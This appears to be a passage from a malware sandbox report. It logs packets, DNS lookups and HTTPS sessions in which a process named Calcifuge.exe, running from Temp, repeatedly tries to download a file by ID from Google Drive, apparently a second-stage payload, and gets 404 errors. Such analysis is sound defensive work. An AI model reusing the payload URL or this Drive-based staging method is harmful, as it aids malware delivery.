                                                                                              Jan 11, 2025 03:53:43.920234919 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.920260906 CET44353785172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.920300007 CET53785443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:43.929326057 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:43.929363012 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:43.929424047 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:43.929672003 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:43.929681063 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.557961941 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.558028936 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.558581114 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.558588028 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.558778048 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.558783054 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996385098 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996452093 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996478081 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.996498108 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996520042 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:44.996520042 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.996556044 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.996596098 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.997292995 CET53786443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:44.997308969 CET44353786172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:45.116138935 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.116182089 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:45.116318941 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.116695881 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.116708994 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:45.753727913 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:45.753983021 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.754522085 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:45.754611015 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.764111042 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.764123917 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:45.764344931 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:45.765010118 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.765355110 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:45.807322025 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:46.164174080 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:46.164258957 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:46.164283037 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:46.164324999 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:46.164453030 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:46.164475918 CET44353787172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:46.164520025 CET53787443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:46.179104090 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:46.179141045 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:46.179219961 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:46.179478884 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:46.179492950 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:46.812911034 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:46.812977076 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:46.813695908 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:46.813708067 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:46.813961029 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:46.813968897 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:47.248871088 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:47.248966932 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:47.248986006 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:47.249034882 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:47.249041080 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:47.249070883 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:47.249088049 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:47.249116898 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:47.249155045 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:47.249201059 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:47.249279022 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:47.249326944 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:47.249733925 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:47.249744892 CET44353788172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:47.249782085 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:47.249792099 CET53788443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:47.381424904 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:47.381475925 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:47.381548882 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:47.381864071 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:47.381877899 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.013649940 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.013761997 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:48.014435053 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.014502048 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:48.016242027 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:48.016268015 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.016539097 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.017015934 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:48.017400980 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:48.059345007 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.397368908 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.397488117 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:48.397557020 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.397617102 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:48.397700071 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:48.397753954 CET44353789172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.397813082 CET53789443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:48.411917925 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:48.411964893 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:48.412043095 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:48.412332058 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:48.412349939 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.077749014 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.077846050 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:49.078330994 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:49.078337908 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.078528881 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:49.078532934 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.518420935 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.518486023 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.518493891 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:49.518510103 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.518536091 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:49.518548012 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.518563986 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:49.518594980 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:49.738262892 CET53790443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:49.738285065 CET44353790172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.882818937 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:49.882874966 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:49.882936001 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:49.883697987 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:49.883718014 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.514277935 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.514417887 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:50.514926910 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.515094042 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:50.516889095 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:50.516921043 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.517151117 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.517210007 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:50.517537117 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:50.559333086 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.904643059 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.904738903 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:50.904781103 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.904824972 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:50.904968023 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:50.905054092 CET44353791172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.905117989 CET53791443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:53:50.921025991 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:50.921082020 CET44353792172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:50.921173096 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:50.921624899 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:50.921648026 CET44353792172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:51.567639112 CET44353792172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:51.569917917 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:51.570458889 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:51.570472002 CET44353792172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:51.570642948 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:51.570648909 CET44353792172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:52.002738953 CET44353792172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:52.002835989 CET44353792172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:52.002897978 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:52.002934933 CET44353792172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:52.002950907 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:52.002954006 CET44353792172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:53:52.002994061 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:52.003803015 CET53792443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:53:52.003822088 CET44353792172.217.16.129192.168.2.4

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 11, 2025 03:52:29.542167902 CET5466553192.168.2.41.1.1.1
                                                                                              Jan 11, 2025 03:52:29.549182892 CET53546651.1.1.1192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.619851112 CET6126953192.168.2.41.1.1.1
                                                                                              Jan 11, 2025 03:52:30.627826929 CET53612691.1.1.1192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.949315071 CET5352160162.159.36.2192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.471029997 CET53549991.1.1.1192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Jan 11, 2025 03:52:29.542167902 CET192.168.2.41.1.1.10x374Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                              Jan 11, 2025 03:52:30.619851112 CET192.168.2.41.1.1.10x2e7aStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Jan 11, 2025 03:52:29.549182892 CET1.1.1.1192.168.2.40x374No error (0)drive.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                              Jan 11, 2025 03:52:30.627826929 CET1.1.1.1192.168.2.40x2e7aNo error (0)drive.usercontent.google.com172.217.16.129A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • drive.google.com
                                                                                              • drive.usercontent.google.com

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449736172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:30 UTC216OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-11 02:52:30 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:30 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-IrzXGIl8lGAW5rdaMEF0wA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449737172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:31 UTC258OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              2025-01-11 02:52:31 UTC2229INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQXUdQ-gSJtroZqw5zw6RaJ4OchFfrKYDwi5vJjFD6OF2m8DHNJH0_2GPXoIOxNGpYY
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:31 GMT
                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-a15_tYGTfByt35S0CAjxlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Set-Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA; expires=Sun, 13-Jul-2025 02:52:31 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:31 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 59 45 4e 45 67 56 78 77 32 39 6c 4e 59 68 6a 42 78 57 36 44 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CYENEgVxw29lNYhjBxW6DA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449738172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:32 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:32 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:32 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-Mtco3-EMxnrg_-DzabutWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.453459172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:52:33 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:33 UTC1844INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC49DtT0F5CMiwKmH3o6B4pfBMElBHuGUKMjjyPhhOHQO_aeDiyjQOwWZwEEdbYyIRIv
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:33 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-oWpfUiVCRk5qqBgeCySB0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
